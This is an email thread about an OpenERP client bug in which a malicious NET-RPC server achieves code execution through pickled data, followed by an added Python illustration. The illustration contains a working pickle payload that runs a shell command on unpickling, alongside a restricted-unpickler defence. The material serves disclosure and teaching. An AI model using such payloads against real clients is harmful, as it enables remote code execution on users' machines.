Hi,
as a security fix, can it be applied to the stable clients too? 5.0.X and 6.X
Thanks
--
Eduard Carreras i Nadal
On 04/07/2011, at 7:46, "Naresh (OpenERP)" <email address hidden> wrote:
> Hello,
>
> Thanks for reporting !
>
> It has been fixed at lp:~openerp-dev/openobject-client/trunk-bug-671926-nch
> and will be merged soon to the trunk client.
>
>
> Thanks !
>
> ** Changed in: openobject-client
> Status: In Progress => Fix Committed
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/671926
>
> Title:
> NET-RPC client-side stack should sanitize pickled data
>
> Status in OpenERP GTK Client:
> Fix Committed
> Status in OpenERP GTK Client 5.0 series:
> Confirmed
> Status in OpenERP Web Client:
> Confirmed
> Status in OpenERP Web Client 5.0 series:
> Confirmed
>
> Bug description:
> It's possible to execute arbitrary code on the client using net-rpc
> (pickle protocol), see http://nadiana.com/python-pickle-insecure
>
> If you use the client to connect to some demo server and this demo
> server is malicious, it can send malicious code which is executed on the
> client side.
>
> I attach an exploit server which sends code to execute to the client. It runs
> ls -l and redirects the output to the proof_of_exploit.txt file.
>
> This bug was fixed in the server, but not in the client.
> Affects versions 4.2, 5.X and 6.X
>
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/openobject-client/+bug/671926/+subscriptions
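The mechanism the bug report describes, as an added illustration that is not part of the thread and not OpenERP's own NET-RPC code: a server reply is an ordinary pickle, and a pickle may name any importable callable and its arguments, so `pickle.loads` on the client becomes a remote command-execution primitive. The payload below runs `echo` instead of the report's `ls -l`, and the restricted unpickler that follows is one way a client can refuse such data (only a short allow-list of builtins passes; the allow-list and the function names are assumptions for the example). Written for Python 3, whereas the 2011 clients were Python 2; the pickle behaviour is the same.

```python
import builtins
import io
import pickle
import subprocess


class MaliciousReply:
    """What a hostile NET-RPC server could put in a reply.

    pickle serialises an object via __reduce__, which may return any callable
    plus arguments; the unpickler calls it on the client. Here the callable is
    subprocess.check_output, so unpickling runs a command and returns its
    output as the 'deserialised' value.
    """

    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return (subprocess.check_output, (self.cmd,))


def build_malicious_payload(cmd):
    """Bytes a malicious server would send; 'cmd' is an argv list."""
    return pickle.dumps(MaliciousReply(cmd))


def unsafe_loads(data):
    """The vulnerable client behaviour: trust whatever the server sent."""
    return pickle.loads(data)


# Assumed allow-list: a client that only ever expects plain RPC data needs
# no globals at all beyond a few builtin containers.
SAFE_BUILTINS = {"set", "frozenset", "bytearray", "complex"}


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global reference except an explicit allow-list.

    Plain ints/str/bytes/lists/tuples/dicts never go through find_class,
    so they still load; anything naming a module-level object (functions,
    classes, os.system, subprocess.check_output, ...) is rejected.
    """

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def safe_loads(data):
    """Hardened replacement for pickle.loads on the client side."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data):
    """True if the restricted unpickler refuses the payload."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    # Constructed sample: what a benign server reply might look like.
    benign = pickle.dumps({"model": "res.partner", "ids": [1, 2, 3]})
    evil = build_malicious_payload(["echo", "pwned"])

    print("benign, restricted:", safe_loads(benign))
    print("evil, unsafe loads :", unsafe_loads(evil))   # command ran on the client
    print("evil, restricted   :", "rejected" if is_rejected(evil) else "ACCEPTED")
```

Restricting `find_class` is a stop-gap: it blocks the global-lookup opcodes, but pickle remains a code-loading format rather than a data format, so the durable fix is a protocol that cannot carry code at all (XML-RPC or JSON), which is the direction the web client later took.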